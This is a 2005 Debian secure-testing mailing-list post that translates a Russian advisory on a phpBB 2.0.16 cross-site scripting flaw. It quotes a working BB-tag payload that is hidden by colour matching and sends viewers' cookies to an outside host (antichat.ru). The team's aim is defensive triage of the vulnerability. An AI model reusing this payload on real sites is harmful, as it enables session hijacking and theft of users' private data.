[Secure-testing-team] Anyone speaking Russian among you?

Steve Langasek vorlon at dodds.net
Wed Jul 6 09:51:17 UTC 2005 

On Wed, Jul 06, 2005 at 11:20:45AM +0200, Moritz Muehlenhoff wrote:
> Hi,
> These advisories on phpbb2 have been posted to Bugtraq. Unfortunately
> they are written in Russian:
> http://www.securitylab.ru/55612.html

  Cross-site scripting with phpbb forums
  Program: phpbb 2.0.16
  Severity: low
  Exploit available: yes
  Description: a vulnerability is phpbb forum allows a remote user to carry
  out an XSS attack.

  The remote user can insert a specially constructed combination of BB tags
  into forum messages to cause arbitrary code execution in the browser of a
  user that views the malicious message.  The vulnerability can be used to
  steal the user's private information (session IDs or cookies).

  Sample exploit:

  [color=#EFEFEF][url]www.ut[url=www.s=''
  style='font-size:0;color:#EFEFEF
  'style='top:expression(eval(this.sss));
  'sss=`i=new/**/Image();
  i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
  this.sss=null`style='font-size:0;]
  [/url][/url]'[/color]

  Replace ЦВЕТ_ФОНА (BACKGROUND_COLOR) with the value for the message
  background used by this forum skin.  For the standard subsilver this is
  #EFEFEF.  This is done so that the introduction of the exploit is not
  noticeable to the naked eye in other browsers where the code doesn't work,
  yadda yadda.

  Author's URL: http://www.phpbb.com

  Solution: there is no fix for this vulnerability at present.

Curiously, this seems to be nothing more than a bad copy from the second
advisory, since there is obviously no occurence of ЦВЕТ_ФОНА in the sample
exploit provided...

> http://antichat.ru/txt/phpbb/

Neither provides any information about a fix.  The second one does go into
more detail, but I'd imagine the sample exploit is the important part and
the rest is ignorable.  If not, Babelfish seems to be a surprisingly usable
Russian-English translation dictionary -- I wonder why they can't do this
good a job on the other languages. :-)

-- 
Steve Langasek
postmodern programmer
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20050706/4fc37995/attachment.pgp

More information about the Secure-testing-team mailing list